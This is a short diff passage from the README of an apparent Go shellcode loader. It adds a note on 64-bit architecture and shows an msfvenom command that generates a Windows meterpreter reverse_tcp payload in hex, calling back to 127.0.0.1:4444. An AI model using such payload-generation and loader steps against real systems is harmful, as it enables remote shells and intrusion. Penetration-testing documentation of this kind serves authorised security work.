brimstone/go-shellcode/README.md

 Usage
 =====

+Keep in mind that only 64bit shellcode will run in a 64bit process.
+This can't autodetect your shellcode architecture.

 Use msfvenom or metasploit to generate a bit of shellcode as hex format:
 ```
 $ msfvenom -p windows/meterpreter/reverse_tcp -f hex -o rev.hex LHOST=127.0.0.1 LPORT=4444